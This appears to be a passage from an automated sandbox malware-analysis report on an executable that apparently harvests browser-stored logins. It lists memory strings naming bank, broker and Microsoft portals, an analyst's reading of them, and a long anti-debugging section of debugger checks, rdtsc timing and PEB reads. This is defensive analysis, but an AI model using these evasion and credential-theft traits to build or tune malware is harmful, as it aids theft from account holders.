Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: dGg-0-kL.13.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: dGg-0-kL.13.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: dGg-0-kL.13.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: AMC password management pageVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000706000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: dGg-0-kL.13.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: z10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: dGg-0-kL.13.dr | Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000011.00000002.1831758654.0000021968EBC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dGg-0-kL.13.dr | Binary or memory string: global block list test formVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: dev.azure.comVMware20,11696492231j
Source: dGg-0-kL.13.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: dGg-0-kL.13.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: dGg-0-kL.13.dr | Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: dGg-0-kL.13.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: dGg-0-kL.13.dr | Binary or memory string: tasks.office.comVMware20,11696492231o
Source: z10982283782.exe, 00000000.00000002.1349705581.0000000000706000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW?u
Source: dGg-0-kL.13.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: dGg-0-kL.13.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: dGg-0-kL.13.dr | Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: takeown.exe, 0000000D.00000002.2488818800.000000000093E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
Source: dGg-0-kL.13.dr | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: dGg-0-kL.13.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: dGg-0-kL.13.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: dGg-0-kL.13.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: ObMmiCfBgqmt.exe, 0000000E.00000002.2491546637.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD
Source: C:\Users\user\Desktop\z10982283782.exe | API call chain: ExitProcess graph end node (graph_0-33148)
Source: C:\Users\user\Desktop\z10982283782.exe | Process information queried: ProcessInformation

Note on the "VMware" and "Hyper-V" strings: every VMware20,1 hit sits in dGg-0-kL, a file dropped by takeown.exe (process 13), the same process that opens the Outlook profile key above. Each entry has the shape <site or form name><VMware20,1><Unix timestamp 1696492231>, which is how records harvested from a browser credential store look, with the VMware20,1 token in the username position; the process that served as the browser here carries the sandbox's FakeChrome debug path. These rows are therefore better read as evidence of stolen decoy credentials than as a VM check performed by the sample. The Hyper-V RAW strings, found next to %SystemRoot%\system32\mswsock.dll, are the catalog name of the Winsock Hyper-V socket provider that ships with current Windows builds and appear in any process that loads the Winsock catalog; they are not a hypervisor check either. The rdtsc and the sleep loops in the rows above are the stronger evasion evidence in this section.

              Anti Debugging

              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AAF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02AAF744
              Source: C:\Users\user\Desktop\z10982283782.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\colorcpl.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\takeown.exe | Process queried: DebugPort
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2276096E rdtsc 10_2_2276096E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762B60 NtClose,LdrInitializeThunk, 10_2_22762B60
              Source: C:\Users\user\Desktop\z10982283782.exe | Code function: 0_2_02AA894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02AA894C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227D0274 mov eax, dword ptr fs:[00000030h] 10_2_227D0274
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22724260 mov eax, dword ptr fs:[00000030h] 10_2_22724260
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271826B mov eax, dword ptr fs:[00000030h] 10_2_2271826B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271A250 mov eax, dword ptr fs:[00000030h] 10_2_2271A250
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F625D mov eax, dword ptr fs:[00000030h] 10_2_227F625D
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22726259 mov eax, dword ptr fs:[00000030h] 10_2_22726259
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227DA250 mov eax, dword ptr fs:[00000030h] 10_2_227DA250
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A8243 mov eax, dword ptr fs:[00000030h] 10_2_227A8243
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A8243 mov ecx, dword ptr fs:[00000030h] 10_2_227A8243
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271823B mov eax, dword ptr fs:[00000030h] 10_2_2271823B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227302E1 mov eax, dword ptr fs:[00000030h] 10_2_227302E1
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F62D6 mov eax, dword ptr fs:[00000030h] 10_2_227F62D6
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A2C3 mov eax, dword ptr fs:[00000030h] 10_2_2272A2C3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227302A0 mov eax, dword ptr fs:[00000030h] 10_2_227302A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B62A0 mov eax, dword ptr fs:[00000030h] 10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B62A0 mov ecx, dword ptr fs:[00000030h] 10_2_227B62A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275E284 mov eax, dword ptr fs:[00000030h] 10_2_2275E284
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A0283 mov eax, dword ptr fs:[00000030h] 10_2_227A0283
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C437C mov eax, dword ptr fs:[00000030h] 10_2_227C437C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A035C mov eax, dword ptr fs:[00000030h] 10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A035C mov ecx, dword ptr fs:[00000030h] 10_2_227A035C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227EA352 mov eax, dword ptr fs:[00000030h] 10_2_227EA352
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C8350 mov ecx, dword ptr fs:[00000030h] 10_2_227C8350
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F634F mov eax, dword ptr fs:[00000030h] 10_2_227F634F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A2349 mov eax, dword ptr fs:[00000030h] 10_2_227A2349
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F8324 mov eax, dword ptr fs:[00000030h] 10_2_227F8324
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F8324 mov ecx, dword ptr fs:[00000030h] 10_2_227F8324
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271C310 mov ecx, dword ptr fs:[00000030h] 10_2_2271C310
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22740310 mov ecx, dword ptr fs:[00000030h] 10_2_22740310
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275A30B mov eax, dword ptr fs:[00000030h] 10_2_2275A30B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273E3F0 mov eax, dword ptr fs:[00000030h] 10_2_2273E3F0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227563FF mov eax, dword ptr fs:[00000030h] 10_2_227563FF
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227303E9 mov eax, dword ptr fs:[00000030h] 10_2_227303E9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CE3DB mov eax, dword ptr fs:[00000030h] 10_2_227CE3DB
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CE3DB mov ecx, dword ptr fs:[00000030h] 10_2_227CE3DB
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C43D4 mov eax, dword ptr fs:[00000030h] 10_2_227C43D4
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227DC3CD mov eax, dword ptr fs:[00000030h] 10_2_227DC3CD
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272A3C0 mov eax, dword ptr fs:[00000030h] 10_2_2272A3C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227283C0 mov eax, dword ptr fs:[00000030h] 10_2_227283C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A63C0 mov eax, dword ptr fs:[00000030h] 10_2_227A63C0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22718397 mov eax, dword ptr fs:[00000030h] 10_2_22718397
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271E388 mov eax, dword ptr fs:[00000030h] 10_2_2271E388
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2274438F mov eax, dword ptr fs:[00000030h] 10_2_2274438F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2274C073 mov eax, dword ptr fs:[00000030h] 10_2_2274C073
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22722050 mov eax, dword ptr fs:[00000030h] 10_2_22722050
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A6050 mov eax, dword ptr fs:[00000030h] 10_2_227A6050
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B6030 mov eax, dword ptr fs:[00000030h] 10_2_227B6030
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271A020 mov eax, dword ptr fs:[00000030h] 10_2_2271A020
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271C020 mov eax, dword ptr fs:[00000030h] 10_2_2271C020
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273E016 mov eax, dword ptr fs:[00000030h] 10_2_2273E016
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A4000 mov ecx, dword ptr fs:[00000030h] 10_2_227A4000
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C2000 mov eax, dword ptr fs:[00000030h] 10_2_227C2000
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271C0F0 mov eax, dword ptr fs:[00000030h] 10_2_2271C0F0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227620F0 mov ecx, dword ptr fs:[00000030h] 10_2_227620F0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271A0E3 mov ecx, dword ptr fs:[00000030h] 10_2_2271A0E3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A60E0 mov eax, dword ptr fs:[00000030h] 10_2_227A60E0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227280E9 mov eax, dword ptr fs:[00000030h] 10_2_227280E9
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A20DE mov eax, dword ptr fs:[00000030h] 10_2_227A20DE
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E60B8 mov eax, dword ptr fs:[00000030h] 10_2_227E60B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E60B8 mov ecx, dword ptr fs:[00000030h] 10_2_227E60B8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227180A0 mov eax, dword ptr fs:[00000030h] 10_2_227180A0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B80A8 mov eax, dword ptr fs:[00000030h] 10_2_227B80A8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272208A mov eax, dword ptr fs:[00000030h] 10_2_2272208A
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F4164 mov eax, dword ptr fs:[00000030h] 10_2_227F4164
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B8158 mov eax, dword ptr fs:[00000030h] 10_2_227B8158
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22726154 mov eax, dword ptr fs:[00000030h] 10_2_22726154
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271C156 mov eax, dword ptr fs:[00000030h] 10_2_2271C156
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B4144 mov eax, dword ptr fs:[00000030h] 10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227B4144 mov ecx, dword ptr fs:[00000030h] 10_2_227B4144
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22750124 mov eax, dword ptr fs:[00000030h] 10_2_22750124
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CA118 mov ecx, dword ptr fs:[00000030h] 10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CA118 mov eax, dword ptr fs:[00000030h] 10_2_227CA118
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E0115 mov eax, dword ptr fs:[00000030h] 10_2_227E0115
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CE10E mov eax, dword ptr fs:[00000030h] 10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227CE10E mov ecx, dword ptr fs:[00000030h] 10_2_227CE10E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227501F8 mov eax, dword ptr fs:[00000030h] 10_2_227501F8
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227F61E5 mov eax, dword ptr fs:[00000030h] 10_2_227F61E5
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2279E1D0 mov eax, dword ptr fs:[00000030h] 10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2279E1D0 mov ecx, dword ptr fs:[00000030h] 10_2_2279E1D0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E61C3 mov eax, dword ptr fs:[00000030h] 10_2_227E61C3
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A019F mov eax, dword ptr fs:[00000030h] 10_2_227A019F
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2271A197 mov eax, dword ptr fs:[00000030h] 10_2_2271A197
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22760185 mov eax, dword ptr fs:[00000030h] 10_2_22760185
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227DC188 mov eax, dword ptr fs:[00000030h] 10_2_227DC188
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227C4180 mov eax, dword ptr fs:[00000030h] 10_2_227C4180
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22752674 mov eax, dword ptr fs:[00000030h] 10_2_22752674
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227E866E mov eax, dword ptr fs:[00000030h] 10_2_227E866E
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275A660 mov eax, dword ptr fs:[00000030h] 10_2_2275A660
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273C640 mov eax, dword ptr fs:[00000030h] 10_2_2273C640
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273E627 mov eax, dword ptr fs:[00000030h] 10_2_2273E627
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22756620 mov eax, dword ptr fs:[00000030h] 10_2_22756620
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22758620 mov eax, dword ptr fs:[00000030h] 10_2_22758620
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2272262C mov eax, dword ptr fs:[00000030h] 10_2_2272262C
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22762619 mov eax, dword ptr fs:[00000030h] 10_2_22762619
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2279E609 mov eax, dword ptr fs:[00000030h] 10_2_2279E609
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2273260B mov eax, dword ptr fs:[00000030h] 10_2_2273260B
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2279E6F2 mov eax, dword ptr fs:[00000030h] 10_2_2279E6F2
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227A06F1 mov eax, dword ptr fs:[00000030h] 10_2_227A06F1
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275A6C7 mov ebx, dword ptr fs:[00000030h] 10_2_2275A6C7
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275A6C7 mov eax, dword ptr fs:[00000030h] 10_2_2275A6C7
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_227566B0 mov eax, dword ptr fs:[00000030h] 10_2_227566B0
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_2275C6A6 mov eax, dword ptr fs:[00000030h] 10_2_2275C6A6
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22724690 mov eax, dword ptr fs:[00000030h] 10_2_22724690
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22728770 mov eax, dword ptr fs:[00000030h] 10_2_22728770
              Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_22730770 mov eax, dword ptr fs:[00000030h] 10_2_22730770
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720750 mov eax, dword ptr fs:[00000030h]10_2_22720750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762750 mov eax, dword ptr fs:[00000030h]10_2_22762750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22762750 mov eax, dword ptr fs:[00000030h]10_2_22762750
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE75D mov eax, dword ptr fs:[00000030h]10_2_227AE75D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A4755 mov eax, dword ptr fs:[00000030h]10_2_227A4755
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275674D mov esi, dword ptr fs:[00000030h]10_2_2275674D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275674D mov eax, dword ptr fs:[00000030h]10_2_2275674D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275674D mov eax, dword ptr fs:[00000030h]10_2_2275674D
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275273C mov eax, dword ptr fs:[00000030h]10_2_2275273C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275273C mov ecx, dword ptr fs:[00000030h]10_2_2275273C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275273C mov eax, dword ptr fs:[00000030h]10_2_2275273C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2279C730 mov eax, dword ptr fs:[00000030h]10_2_2279C730
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C720 mov eax, dword ptr fs:[00000030h]10_2_2275C720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C720 mov eax, dword ptr fs:[00000030h]10_2_2275C720
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22720710 mov eax, dword ptr fs:[00000030h]10_2_22720710
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22750710 mov eax, dword ptr fs:[00000030h]10_2_22750710
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275C700 mov eax, dword ptr fs:[00000030h]10_2_2275C700
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227247FB mov eax, dword ptr fs:[00000030h]10_2_227247FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227247FB mov eax, dword ptr fs:[00000030h]10_2_227247FB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227427ED mov eax, dword ptr fs:[00000030h]10_2_227427ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227427ED mov eax, dword ptr fs:[00000030h]10_2_227427ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227427ED mov eax, dword ptr fs:[00000030h]10_2_227427ED
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AE7E1 mov eax, dword ptr fs:[00000030h]10_2_227AE7E1
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2272C7C0 mov eax, dword ptr fs:[00000030h]10_2_2272C7C0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A07C3 mov eax, dword ptr fs:[00000030h]10_2_227A07C3
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227207AF mov eax, dword ptr fs:[00000030h]10_2_227207AF
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227D47A0 mov eax, dword ptr fs:[00000030h]10_2_227D47A0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227C678E mov eax, dword ptr fs:[00000030h]10_2_227C678E
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274A470 mov eax, dword ptr fs:[00000030h]10_2_2274A470
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274A470 mov eax, dword ptr fs:[00000030h]10_2_2274A470
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274A470 mov eax, dword ptr fs:[00000030h]10_2_2274A470
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AC460 mov ecx, dword ptr fs:[00000030h]10_2_227AC460
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DA456 mov eax, dword ptr fs:[00000030h]10_2_227DA456
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2274245A mov eax, dword ptr fs:[00000030h]10_2_2274245A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275E443 mov eax, dword ptr fs:[00000030h]10_2_2275E443
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275A430 mov eax, dword ptr fs:[00000030h]10_2_2275A430
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E420 mov eax, dword ptr fs:[00000030h]10_2_2271E420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E420 mov eax, dword ptr fs:[00000030h]10_2_2271E420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271E420 mov eax, dword ptr fs:[00000030h]10_2_2271E420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2271C427 mov eax, dword ptr fs:[00000030h]10_2_2271C427
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227A6420 mov eax, dword ptr fs:[00000030h]10_2_227A6420
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758402 mov eax, dword ptr fs:[00000030h]10_2_22758402
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758402 mov eax, dword ptr fs:[00000030h]10_2_22758402
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22758402 mov eax, dword ptr fs:[00000030h]10_2_22758402
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227204E5 mov ecx, dword ptr fs:[00000030h]10_2_227204E5
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227544B0 mov ecx, dword ptr fs:[00000030h]10_2_227544B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227AA4B0 mov eax, dword ptr fs:[00000030h]10_2_227AA4B0
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227264AB mov eax, dword ptr fs:[00000030h]10_2_227264AB
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_227DA49A mov eax, dword ptr fs:[00000030h]10_2_227DA49A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275656A mov eax, dword ptr fs:[00000030h]10_2_2275656A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275656A mov eax, dword ptr fs:[00000030h]10_2_2275656A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_2275656A mov eax, dword ptr fs:[00000030h]10_2_2275656A
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728550 mov eax, dword ptr fs:[00000030h]10_2_22728550
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22728550 mov eax, dword ptr fs:[00000030h]10_2_22728550
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 10_2_22730535 mov eax, dword ptr fs:[00000030h]10_2_22730535
